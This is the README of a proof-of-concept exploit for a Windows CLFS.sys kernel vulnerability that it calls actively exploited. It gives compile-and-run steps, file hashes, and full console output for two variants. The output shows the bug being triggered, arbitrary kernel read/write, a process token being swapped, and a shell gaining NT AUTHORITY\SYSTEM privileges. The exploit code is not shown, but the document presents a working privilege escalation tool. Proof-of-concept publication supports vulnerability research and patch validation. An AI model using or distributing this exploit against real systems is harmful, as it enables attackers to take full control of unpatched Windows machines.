# CVE-2024-49138-POC

Proof of Concept that exploits [CVE-2024-49138](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138) in CLFS.sys. 

CrowdStrike detected the vulnerability actively exploited by threat actors.

Tested on **Windows 11 23h2**.

A thorough analysis is available [here](https://security.humanativaspa.it/tag/cve-2024-49138/).

Below the hash of the ntoskrnl.exe and clfs.sys that were used to test the POC.

```
PS C:\Windows\System32\drivers> Get-FileHash .\clfs.sys

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          B138C28F72E8510F9612D07D5109D73065CED6CBBF8079A663A1E0601FE0FBAA       C:\Windows\System32\drivers\c...

PS C:\Windows\System32\drivers>
```
```
PS C:\Windows\System32> Get-FileHash .\ntoskrnl.exe

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          0CE15480462E9CD3F7CBF2D44D2E393CF5674EE1D69A3459ADFA0E913A7A2AEB       C:\Windows\System32\ntoskrnl.exe


PS C:\Windows\System32>
```

## Compile and Run

Compile x64 Release version.

Run and get a system shell.

```
PS C:\Users\IEUser\Desktop> whoami
windows11\ieuser
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority set to REALTIME_PRIORITY_CLASS.
Thread priority set to the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed with error 6601
Process priority set to NORMAL_PRIORITY_CLASS.
Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.

C:\Users\IEUser\Desktop>whoami
nt authority\system

C:\Users\IEUser\Desktop>
```

![systemshell](https://github.com/user-attachments/assets/788d4096-1c9c-46a6-ad52-988e6538dd18)

Output of second exploit in `second` branch.

```
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF780DDA080
hResource = 0x00007FF780DDA0A0
pResourceData = 0x00007FF780DDA0A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80259800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FF9B750FB40
NtWriteVirtualMemory = 0x00007FF9B750FAA0
CreateThread returned successfully
spawned thread sleeping...pcclfscontainer = 0x0000000002100000
ppfileObject = 0x0000000002100030
pfileObject = 0x0000000002100130
pDeviceObject = 0x0000000002100230
pdriverObject = 0x0000000002100330
pDriverFuction = 0x00000000021003C8
driverFunction = 0xFFFFF80259FF06A0
address_to_write = 0xFFFFAB00027682B2
file opened successfully
triggering vuln...
AddLogContainer failed with error 6643
hijacking execution flow. Wait 15 seconds...
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFAB0003A6A578
systemtoken = 0xFFFFC2084BC1C6E6
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
```

![systemshell_second](https://github.com/user-attachments/assets/3c5c518e-4610-456e-8b38-d8bf975ce386)

